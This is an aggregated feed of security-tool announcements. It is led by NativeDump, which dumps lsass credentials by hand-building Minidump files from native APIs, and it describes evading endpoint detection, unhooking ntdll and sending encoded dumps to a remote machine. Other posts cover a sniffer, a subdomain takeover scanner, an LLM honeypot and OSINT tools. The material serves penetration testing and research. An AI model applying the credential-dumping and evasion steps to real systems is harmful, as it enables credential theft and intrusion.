FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

By: Zion3R


NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).


  • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
  • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
  • NtOpenProcess to get a handle for the lsass process
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

Usage:

NativeDump.exe [DUMP_FILE]

The default file name is "proc_.dmp":

The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

The project has three branches at the moment (apart from the main branch with the basic technique):

  • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

  • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

  • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


Technique in detail: Creating a minimal Minidump file

After reading Minidump undocumented structures, its structure can be summed up to:

  • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
  • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
  • Streams: Every stream contains different information related to the process and has its own format
  • Regions: The actual bytes from the process from each memory region which can be read

I created a parsing tool which can be helpful: MinidumpParser.

We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


A. Header

The header is a 32-bytes structure which can be defined in C# as:

public struct MinidumpHeader
{
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}

The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header


B. Stream Directory

Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Size;
public uint Location;
}

The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

ID Stream Type
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 HandleOperationListStream

C. SystemInformation Stream

First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}

The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


D. ModuleList Stream

Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}

As there is only one, it gets simplified to:

public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}

The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


E. Memory64List Stream

Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.

public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}

Each module entry is a 16-bytes structure:

public struct Memory64Info
{
public IntPtr Address;
public IntPtr Size;
}

The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them


F. Looping memory regions

There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:

  1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
  2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
  3. Open a process handle. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream


G. Creating Minidump file

After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




Above - Invisible Network Protocol Sniffer

By: Zion3R


Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


Above: Invisible network protocol sniffer
Designed for pentesters and security engineers

Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert

Disclaimer

All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

It is a specialized network security tool that helps both pentesters and security professionals.

Mechanics

Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

Supported protocols

Detects up to 27 protocols:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)

Operating Mechanism

Above works in two modes:

  • Hot mode: Sniffing on your interface specifying a timer
  • Cold mode: Analyzing traffic dumps

The tool is very simple in its operation and is driven by arguments:

  • Interface: Specifying the network interface on which sniffing will be performed
  • Timer: Time during which traffic analysis will be performed
  • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
  • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
  • Passive ARP: Detecting hosts in a segment using Passive ARP
usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)

Information about protocols

The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

  • Impact: What kind of attack can be performed on this protocol;

  • Tools: What tool can be used to launch an attack;

  • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

  • Mitigation: Recommendations for fixing the security problems

  • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


Installation

Linux

You can install Above directly from the Kali Linux repositories

caster@kali:~$ sudo apt update && sudo apt install above

Or...

caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install

macOS:

# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools

# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install

Don't forget to deactivate your firewall on macOS!

Settings > Network > Firewall


How to Use

Hot mode

Above requires root access for sniffing

Above can be run with or without a timer:

caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + С

WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

Example:

caster@kali:~$ sudo above --interface eth0 --timer 120

-----------------------------------------------------------------------------------------
[+] Start sniffing...

[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------

If you need to record the sniffed traffic, use the --output argument

caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

If you interrupt the tool with CTRL+C, the traffic is still written to the file

Cold mode

If you already have some recorded traffic, you can use the --input argument to look for potential security issues

caster@kali:~$ above --input ospf-md5.cap

Example:

caster@kali:~$ sudo above --input ospf-md5.cap

[+] Analyzing pcap file...

--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication

Passive ARP

The tool can detect hosts without noise in the air by processing ARP frames in passive mode

caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

[+] Host discovery using Passive ARP

--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------

Outro

I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




Subhunter - A Fast Subdomain Takeover Tool

By: Zion3R


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R


TL;DR: Galah (/ɡəˈlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

██████ █████ ██ █████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ███ ███████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██
██████ ██ ██ ███████ ██ ██ ██ ██
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

😑

% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

By: Zion3R

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject — in this case planes!

Aircraft Information

  • Tail Number 🛫
  • Aircraft Type ⚙️
  • ICAO24 Designation 🔎
  • Manufacturer Details 🛠
  • Flight Logs 📄
  • Aircraft Owner ✈️
  • Model 🛩
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack works best for Python version 3.

Preview

Features

skytrack features three main functions for aircraft information

gathering and display options. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address N-Number (Tail Number)

a00001 N1

a00002 N1A

a00003 N1AA

You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

:warning: Converter only works for USA-registered aircraft

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R


WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.



Raven - CI/CD Security Analyzer

By: Zion3R


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

